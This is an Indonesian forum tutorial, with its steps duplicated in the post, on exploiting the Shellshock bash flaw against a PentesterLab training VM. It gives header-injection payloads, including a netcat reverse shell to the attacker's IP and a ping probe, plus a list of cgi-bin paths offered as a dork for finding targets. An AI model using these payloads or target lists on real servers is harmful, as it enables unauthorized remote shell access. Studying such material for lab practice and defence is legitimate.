11-14-2014, 07:35 PM
Ini adalah materi dari sub regional sub solo bulan september kemarin, langsung aja bagaimana cara exploitasi celah yang begitu hot2nya pada bulan september.
1. Untuk melakukan pengujian shellshock secara legal, download ISO dari Pentesterlab dimana di ISO tersebut memiliki kerentanan yaitu Shellshock. Download disini CVE-2014-6271 vulnerable VM
2. Setelah didownload, buka menggunakan VMware, kemudian setting IP dan Netmasknya.
Contoh : ifconfig eth0 172.16.208.20 netmask 255.255.255.0
![[Image: image.png]](http://s26.postimg.org/ilocfr4k9/image.png)
3. Setelah itu ,akses IP tadi dari sisi client / Attacker.
![[Image: image.png]](http://s26.postimg.org/eqkyd6leh/image.png)
4. Mengakses cgi-bin ,dimana shellshock bisa dieksploitasi dari sisi webserver apabila web tersebut memiliki cgi-bin yang aktif. Untuk dork cgi-bin bisa gunakanan ini :
![[Image: image.png]](http://s26.postimg.org/zbzq532zd/image.png)
5. Untuk menguji apakah target vulner terhadap shellsock, saya mencoba dengan menerapkan firewall log icmp ,agar ketika saya melakukan injeksi dengan perintah ping dapat terlog oleh system saya.
![[Image: image.png]](http://s26.postimg.org/usnhjkl3t/image.png)
6. Buka Live Http header ( Add Ons Mozilla Firefox )
![[Image: image.png]](http://s26.postimg.org/rkj06iyu1/image.png)
7. Pada bagian User-Agent saya ganti dengan injeksi shellshock, berikut injeksinya
() { :;}; /bin/bash -c “ping 172.16.208.2” IP 172.16.208.2 adalah IP Laptop saya. Kemudian Klick Replay pada Live HTTP Headernya.
![[Image: image.png]](http://s26.postimg.org/spd2bwlax/image.png)
8. Melakukan cek log apakah ada protocol icmp ( ping ) yang masuk , tail -f /var/log/messages
![[Image: image.png]](http://s26.postimg.org/bq8padzh5/image.png)
9. Saya mendapatkan log dimana SRC 172.16.208.20 dengan DST 172.16.208.2 berhubungan melalui protocol ICMP. Dengan begini, berarti injeksi tadi berhasil dan system target mempunyai vulner shellshock.
10. Mencoba melakukan BACK-CONNECT dengan NC untuk mendapatkan akses Shell.
11. Saya membuat listening terlebih dahulu menggunakan NC.
![[Image: image.png]](http://s26.postimg.org/9zpo8why1/image.png)
12. Kemudian kembali ke Live HTTP Header dan masukan injeksi ini :
() { :;}; /bin/bash -c “nc 172.16.208.2 4444 –e /bin/bash -i”
Kemudian klick replay.
![[Image: image.png]](http://s26.postimg.org/bg16r1kux/image.png)
13. Dan ,saya mendapatkan akses shell lewat NC.
![[Image: image.png]](http://s26.postimg.org/rfjualgwp/image.png)
14. Untuk mendapatkan akses root, kita bisa melakukannya dengan local root exploit.
1. Untuk melakukan pengujian shellshock secara legal, download ISO dari Pentesterlab dimana di ISO tersebut memiliki kerentanan yaitu Shellshock. Download disini CVE-2014-6271 vulnerable VM
2. Setelah didownload, buka menggunakan VMware, kemudian setting IP dan Netmasknya.
Contoh : ifconfig eth0 172.16.208.20 netmask 255.255.255.0
3. Setelah itu ,akses IP tadi dari sisi client / Attacker.
4. Mengakses cgi-bin ,dimana shellshock bisa dieksploitasi dari sisi webserver apabila web tersebut memiliki cgi-bin yang aktif. Untuk dork cgi-bin bisa gunakanan ini :
Code:
/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi
/xul/
/cgi-bin/status
/tmUnblock.cgi
/gitweb/
/gitweb.cgi
/gitweb/gitweb.cgi
/cgi-bin/
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php4
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/firmwarecfg
/cgi-bin/%2f/admin.html
/cgi-bin/admin.html
/cgi-bin/test-cgi
/sys-cgi
/dana-na/auth/url_default/welcome.cgi
/cgi-bin/tree.php
/cgi-bin/ICuGI/EST/blast_detail.cgi
/cgi-bin/hello
/cgi-sys/defaultwebpage.cgi
/cgi-bin/w3mman2html.cgi
/cgi-bin/status/status.cgi5. Untuk menguji apakah target vulner terhadap shellsock, saya mencoba dengan menerapkan firewall log icmp ,agar ketika saya melakukan injeksi dengan perintah ping dapat terlog oleh system saya.
6. Buka Live Http header ( Add Ons Mozilla Firefox )
7. Pada bagian User-Agent saya ganti dengan injeksi shellshock, berikut injeksinya
() { :;}; /bin/bash -c “ping 172.16.208.2” IP 172.16.208.2 adalah IP Laptop saya. Kemudian Klick Replay pada Live HTTP Headernya.
8. Melakukan cek log apakah ada protocol icmp ( ping ) yang masuk , tail -f /var/log/messages
9. Saya mendapatkan log dimana SRC 172.16.208.20 dengan DST 172.16.208.2 berhubungan melalui protocol ICMP. Dengan begini, berarti injeksi tadi berhasil dan system target mempunyai vulner shellshock.
10. Mencoba melakukan BACK-CONNECT dengan NC untuk mendapatkan akses Shell.
11. Saya membuat listening terlebih dahulu menggunakan NC.
12. Kemudian kembali ke Live HTTP Header dan masukan injeksi ini :
() { :;}; /bin/bash -c “nc 172.16.208.2 4444 –e /bin/bash -i”
Kemudian klick replay.
13. Dan ,saya mendapatkan akses shell lewat NC.
14. Untuk mendapatkan akses root, kita bisa melakukannya dengan local root exploit.